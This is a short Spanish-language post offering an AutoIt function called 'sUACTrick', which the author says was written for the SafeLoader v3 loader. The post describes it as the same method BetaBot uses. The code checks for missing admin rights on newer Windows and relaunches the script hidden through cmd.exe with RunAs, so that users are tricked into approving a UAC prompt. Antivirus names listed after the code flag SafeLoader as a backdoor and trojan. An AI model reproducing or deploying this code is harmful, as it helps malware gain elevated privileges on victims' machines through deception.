Esta es una pequeña función que estaba implementando a la SafeLoader v3, trata de elevar privilegios mediante Ingenieria Social, si no los consigue continua con su ejecución normal, es el mismo metodo que usa la BetaBot.
#cs ----------------------------------------------------------------------------
Script Name: sUACTrick
AutoIt Version: 3.3.8.1
Author: Scorpio
Thanks To: Pink
Script Function:
Tries to elevate privileges by Social Engineering.
#ce ----------------------------------------------------------------------------
Func sUACTrick()
Local $sVer
$sVer = RegRead("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion", "CurrentVersion")
If IsAdmin() = False And $sVer >= 6.0 Then
ShellExecute(@SystemDir & '\cmd.exe', '/c "' & @ScriptFullPath & '"', '', 'RunAs', @SW_HIDE)
EndIf
EndFunc
//Regards.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/